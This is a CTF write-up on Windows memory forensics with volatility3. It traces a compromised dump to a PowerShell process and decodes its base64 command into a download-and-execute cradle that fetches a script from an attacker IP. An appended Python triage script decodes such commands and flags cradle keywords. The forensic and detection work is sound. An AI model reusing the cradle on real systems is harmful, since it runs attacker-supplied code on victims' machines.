Memory Forensics — Windows

Tejendra Saradhi
Oct 26, 2021

Auth0 — CTF

Introduction

This is the writeup for the Compromised challenge from the Auth0 CTF.

We are given a 2GB file, compromised.raw. At first I wasn't sure what kind of artifact it was: a memory dump or a corrupted disk image.
After unsuccessful attempts to open it with Autopsy, I was sure that this is a memory dump. We will analyze the image with volatility3.

Finding the Operating System of Memory Dump

  • Checking if the image is Linux
Strings output on Compromised.raw

Thus we can see this doesn't look like a Linux memory dump. For more confirmation you could also grep for other strings that are typically present in Linux memory, like the following:

Example strings that can be grepped for in the memory dump
  • Checking if it's Windows
Strings output on Compromised.raw

I feel like this could be a Windows memory dump.

Analysis

Let's list the processes.

  • Process List

windows.pslist

Pslist
  • Process Tree

windows.pstree

Pstree

PowerShell looks suspicious to me. The challenge description asks for the malicious process, its process ID and a timestamp.

I cross-checked every process name and its executable path. Everything was in the correct place.

  • Checking commands executed

windows.cmdline

Commands executed by the process

The following is the string that was executed:

aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADkAOgA4ADAALwA1ADQALgBwAHMAMQAnACkAKQA=

When base64-decoded, we get: iex ((new-object net.webclient).downloadstring('http://192.168.1.9:80/54.ps1'))
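As an added example that is not part of the original writeup: a small Python triage script that takes windows.cmdline output, finds long base64 blobs in each process's arguments, decodes them as UTF-16LE (the encoding PowerShell's -EncodedCommand uses, which is why the page's blob has a 00 byte after every character) and flags download-cradle markers and URLs. The sample cmdline rows, the PowerShell switches and the svchost row are constructed; the encoded string and PID 2880 come from the page.

```python
import base64
import binascii
import re

# The page's own encoded command, as recovered from the windows.cmdline output.
ENCODED = "aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADkAOgA4ADAALwA1ADQALgBwAHMAMQAnACkAKQA="

# Constructed windows.cmdline output: PID 2880 / powershell.exe come from the
# page; the -EncodedCommand invocation and the svchost row are assumed.
SAMPLE_CMDLINE = f"""PID\tProcess\tArgs
1872\tsvchost.exe\tC:\\Windows\\system32\\svchost.exe -k netsvcs
2880\tpowershell.exe\tpowershell.exe -NoProfile -EncodedCommand {ENCODED}
"""

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                  "net.webclient", "invoke-webrequest", "frombase64string")


def decode_encoded_command(blob):
    """-EncodedCommand payloads are base64 over UTF-16LE text; None if not."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Random base64 rarely decodes to clean printable script text.
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def triage_cmdline_output(output):
    """Parse windows.cmdline rows and flag those with cradle markers or URLs."""
    hits = []
    for line in output.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)       # PID, Process, Args
        if len(parts) < 3:
            continue
        pid, name, args = parts
        decoded = next(filter(None, map(decode_encoded_command, B64_RE.findall(args))), None)
        views = [args] + ([decoded] if decoded else [])
        markers = sorted({m for v in views for m in CRADLE_MARKERS if m in v.lower()})
        urls = [u for v in views for u in URL_RE.findall(v)]
        if markers or urls:
            hits.append({"pid": int(pid), "process": name, "decoded": decoded,
                         "markers": markers, "urls": urls})
    return hits
```

Running `triage_cmdline_output(SAMPLE_CMDLINE)` returns one hit for PID 2880 with the decoded cradle and the URL http://192.168.1.9:80/54.ps1; the same function can be pointed at the real `vol -f compromised.raw windows.cmdline` text.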

Putting it together

I assume the attacker had already obtained a shell and then tried to download the exploit script from their attack box. Thus the attacker's IP is 192.168.1.9, the malicious process is PowerShell.exe, the process ID is 2880, and the timestamp is 2021-02-06 00:41:29.

Kudos, challenge solved 🥳🥳!
